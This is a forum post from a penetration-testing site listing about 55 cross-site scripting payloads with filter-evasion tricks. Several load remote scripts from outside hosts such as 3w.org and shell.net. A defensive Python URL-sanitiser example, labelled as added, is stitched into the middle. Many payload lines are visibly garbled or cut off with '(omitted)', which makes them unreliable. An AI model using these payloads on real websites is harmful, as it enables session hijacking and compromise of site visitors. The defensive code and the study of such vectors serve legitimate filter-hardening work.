China Network Penetration Testing Alliance
Title:
XSS Attack Roundup
Author:
admin
Time:
2016-4-28 10:06
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative ways to trigger an alert box

<q/oncut=alert()>1

<s/onclick=alert()>b

<XSS=" onclick="alert(1)//">clickme</SSX=">

<zzz onclick=alert`1`>clickme</zzz>

<a onclick=alert`1`>clickme</a>

<a=">clickme</a=">

<a=">clickme</a>

<z=">clickme</z=">

<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons, no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML character-reference encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (encoding calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (encoding calculator)

<IMG SRC=jav..(omitted)..S')>

(9) 7-digit UTF-8 Unicode encoding, without semicolons (encoding calculator)

<IMG SRC=jav..(omitted)..S')>

(10) Hex encoding, also without semicolons (encoding calculator)

<IMG SRC=\'#\'" /span>
(11) Embedded tab, splitting up the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line injected JavaScript, an extreme XSS example

<IMG SRC=\'#\'" /span>
(16) Working around character limits (all fragments must be on the same page)

<script>z='document.'</script>

<script>z=z+'write("'</script>

<script>z=z+'<script'</script>

<script>z=z+' src=ht'</script>

<script>z=z+'tp://ww'</script>

<script>z=z+'w.shell'</script>

<script>z=z+'.net/1.'</script>

<script>z=z+'js></sc'</script>

<script>z=z+'ript>")'</script>

<script>eval(z)</script>
(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically ineffective in domestic environments, since there is nowhere they can be exploited)

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=\'#\'" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>
(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
(41) META link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split up

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything that begins with an open angle bracket and a letter)

<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

expression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains XSS

<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
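The encoding, case and whitespace tricks catalogued above (items 3-5, 8-14, 17, 19, 40 and 47) share one lesson for defenders: a filter that searches the raw attribute value for the string `javascript:` is defeated by anything the browser normalises away before it parses the scheme. The following Python is an added defensive example, not code from the original post; it canonicalises a URL attribute the way a lenient HTML/URL parser would (decode character references once, with or without semicolons, then drop the ignorable characters listed in item 47) and only then applies an allowlist of schemes. `decode_entities`, `canonical_scheme`, `is_safe_url`, `naive_is_safe` and the sample inputs in `SAMPLES` are all constructed for this example.

```python
import re
from typing import List, Optional, Tuple

# Characters that lenient HTML/CSS/URL parsers have been observed to skip inside a
# scheme. The set follows the list in item (47) of the post (1-32, 34, 39, 160,
# 8192-8200, 13, 12288, 65279) plus NUL (item 17). Treating all of them as
# ignorable is deliberately conservative: it errs toward rejecting.
_IGNORED = set(range(0, 33)) | {34, 39, 160, 12288, 65279} | set(range(8192, 8201))

# Small subset of HTML5 named character references (names are case-sensitive).
_NAMED = {"Tab": "\t", "NewLine": "\n", "colon": ":", "amp": "&",
          "lt": "<", "gt": ">", "quot": '"', "apos": "'"}

_ENTITY = re.compile(
    r"&#[xX]([0-9a-fA-F]{1,6});?"   # hex reference, ';' optional (item 10)
    r"|&#([0-9]{1,7});?"            # decimal reference, ';' optional (items 5, 8, 9)
    r"|&([A-Za-z][A-Za-z0-9]*);"    # named reference terminated by ';'
    r"|&(amp|lt|gt|quot)\b"         # legacy names browsers also accept without ';'
)


def decode_entities(value: str) -> str:
    """Decode character references once, as a browser does for an attribute value."""
    def repl(m) -> str:
        hexd, dec, named, legacy = m.groups()
        if hexd is not None or dec is not None:
            cp = int(hexd, 16) if hexd is not None else int(dec)
            return chr(cp) if cp <= 0x10FFFF else "\ufffd"
        return _NAMED.get(named or legacy, m.group(0))  # unknown name: leave as-is
    return _ENTITY.sub(repl, value)


def canonical_scheme(url: str) -> Optional[str]:
    """Scheme a lenient browser would see after decoding and stripping ignorable
    characters (lower-cased), or None when the URL is relative."""
    decoded = decode_entities(url)
    cleaned = "".join(ch for ch in decoded if ord(ch) not in _IGNORED)
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", cleaned)
    return m.group(1).lower() if m else None


SAFE_SCHEMES = {"http", "https", "mailto"}


def is_safe_url(url: str) -> bool:
    """Allowlist check: relative URLs and http/https/mailto pass, all other schemes are rejected."""
    scheme = canonical_scheme(url)
    return scheme is None or scheme in SAFE_SCHEMES


def naive_is_safe(url: str) -> bool:
    """The blocklist most of the vectors above were written to defeat: a plain substring search."""
    return "javascript:" not in url.lower()


# Constructed sample attribute values, one per evasion class from the post, with the expected verdict.
SAMPLES: List[Tuple[str, bool]] = [
    ("javascript:alert('XSS')", False),                     # (3) plain
    ("JaVaScRiPt:alert('XSS')", False),                     # (4) mixed case
    ("&#106;&#97;&#118;&#97;script:alert('XSS')", False),   # (5) decimal references with semicolons
    ("&#106&#97&#118&#97script:alert('XSS')", False),       # (9) decimal references, no semicolons
    ("&#x6A&#x61&#x76&#x61script:alert('XSS')", False),     # (10) hex references, no semicolons
    ("jav\tascript:alert('XSS')", False),                   # (11) embedded tab
    ("jav&#x09;ascript:alert('XSS')", False),               # (12) encoded tab
    ("jav\nascript:alert('XSS')", False),                   # (13) newline
    ("jav\rascript:alert('XSS')", False),                   # (14) carriage return
    ("java\0script:alert('XSS')", False),                   # (17) NUL byte
    (" \t javascript:alert('XSS')", False),                 # (19) leading whitespace
    ('vbscript:MsgBox("XSS")', False),                      # (40) VBScript scheme
    ("https://example.com/page", True),
    ("/relative/path?q=javascript:alert(1)", True),         # colon only inside the query string
    ("mailto:admin@example.com", True),
]


def check_samples() -> List[Tuple[str, bool, bool]]:
    """Samples whose allowlist verdict differs from the expected one (empty when all agree)."""
    return [(u, want, is_safe_url(u)) for u, want in SAMPLES if is_safe_url(u) != want]


def naive_misses() -> int:
    """Number of unsafe samples the substring blocklist lets through."""
    return sum(1 for u, want in SAMPLES if not want and naive_is_safe(u))


if __name__ == "__main__":
    print("allowlist mismatches:", check_samples())
    print("unsafe samples missed by the naive blocklist:", naive_misses(),
          "of", sum(1 for _, want in SAMPLES if not want))
```

Decoding once, stripping, and then allowlisting mirrors the order in which a browser processes the value, which is why the check catches every class in `SAMPLES` while the substring blocklist misses most of them. The protocol-relative form in item (25) (`//host/...`) passes as a relative URL here: restricting destination hosts is a separate, same-origin concern, not a scheme check.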
Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/)
Powered by Discuz! X3.2